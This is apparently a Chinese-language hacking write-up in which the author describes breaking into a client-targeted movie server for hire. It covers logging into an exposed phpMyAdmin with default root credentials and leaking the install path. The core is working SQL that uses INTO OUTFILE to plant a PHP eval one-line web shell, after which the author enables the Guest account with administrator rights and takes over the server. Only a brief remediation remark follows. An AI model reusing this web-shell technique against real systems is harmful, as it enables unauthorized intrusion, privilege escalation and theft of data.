關於PHPMYADMIN的入侵提權拿伺服器
1.今天收到客戶一個單子,說是要黑一臺電影伺服器,然後給了我IP 61.147.*.*
開啟網站一看,發現是用FLEAPHP寫的一個程式
因為剛好在研究FLEAPHP開源開發系統,大致瞭解一些語法,可是沒有能利用的,而且整個伺服器也只有這麼一個網站
2.FleaPHP 為開發者輕鬆、快捷的建立應用程式提供幫助。FleaPHP 框架簡單、清晰,容易理解和學習,並且有完全中文化的文件和豐富的示
例程式降低學習成本。
使用 FleaPHP 框架開發的應用程式能夠自動適應各種執行環境,併兼容 PHP4 和 PHP5。
3.既然是PHP那肯定有PHPMYADMIN,嘗試著在網站地址後 加入 61.147.*.*/phpmyadmin
哈哈,能直接開啟,這時候,就差使用者名稱和密碼了
因為事先在看網站的時候,我直接在網站地址後加了個 61.147.*.*/ROOT
沒想到能檢視他的目錄,所以,我在 PHPMYADMIN裡面就用預設使用者
ROOT ROOT
成功登陸
發現他有三個資料庫。。這時候就要利用到 PHPMYADMIN的入侵了
4.首先 開啟phpmyadmin
就是在PHPMYADMIN後面加 libraries/select_lang.lib.php
得到他的路徑 C:APMhtdocsphpMyAdminlibraries
這個一定要記錄下來
然後 進入PHPMYADMIN
用預設使用者進去
執行 SQL語句
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[1]);?>");
select cmd from a into outfile "C:/APM/htdocs/phpMyAdmin/libraries/d.php";
Drop TABLE IF EXISTS a;
語句詳細意思
建立一個A表 寫入 <?php eval($_POST[1]);?>
熟悉這個的都知道 <?php eval($_POST[1]);?>這個就是一句話了
1是密碼 可以自行修改
把裡面的資訊輸出到 phpMyAdmin/libraries/d.php
這個檔案
d.php 名字也可以自己入
Drop TABLE IF EXISTS a 如果有 A表 將刪除
然後執行
OK 寫入成功
這個時候用一句話連線
傳上SHELL
進去 一查 原來是個WIN系統
開啟GUEST 給予管理許可權
伺服器成功到手
1.5T的電影 呵呵
此方法一是爆出了路徑 二是管理員大意 沒有修改預設密碼
所以
漏洞詳細解決方法:
就是修改管理員密碼
這樣 可以阻止黑客進入PHPMYADMIN進行SQL執行
當然 IDC商也要禁止客戶商的一些許可權
這樣就可以保證了